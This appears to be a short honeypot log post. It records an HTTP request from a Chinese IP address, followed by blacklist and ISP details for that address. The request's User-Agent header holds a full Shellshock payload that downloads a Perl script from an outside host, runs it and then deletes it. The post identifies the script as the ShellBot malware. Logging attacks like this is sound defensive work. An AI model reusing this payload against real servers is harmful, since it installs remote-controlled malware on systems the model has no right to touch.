BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js
/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close
The downloadable perl script is identified as
a2.log: Perl.ShellBot-4 FOUND
| Blacklist Status | BLACKLISTED 5/40 |
| IP Address | 222.241.151.149 ( Websites Lookup ) |
| Reverse DNS | Unknown |
| ASN | AS4134 |
| ASN Owner | Chinanet |
| ISP | Chinanet Hunan Province Network |
| Continent | Asia |
| Country Code |  (CN) China |
| Latitude / Longitude | 28.1792 / 113.114 |
| City | Changsha |
| Region | Hunan |
Keine Kommentare:
Kommentar veröffentlichen